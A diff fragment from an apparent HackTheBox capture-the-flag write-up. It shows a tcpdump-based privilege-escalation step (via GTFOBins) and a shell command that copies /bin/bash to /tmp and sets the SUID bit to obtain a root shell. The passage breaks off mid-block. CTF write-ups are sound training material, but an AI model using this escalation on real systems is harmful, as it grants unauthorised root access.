0xzack1/CTFs/HackTheBox/strutted.md

 ```

 - GTFOBins has an entry for tcpdump
-- We create a script that will copy `/bin/bash` to `/tmp/root` , assign it the SUID bit, and execute it with root privilege
+- We copy `/bin/bash` to `/tmp/root` , assign it the SUID bit, and execute it with root privilege

 ```bash
 james@strutted:~$ COMMAND='cp /bin/bash /tmp/bash_root && chmod +s /tmp/bash_root'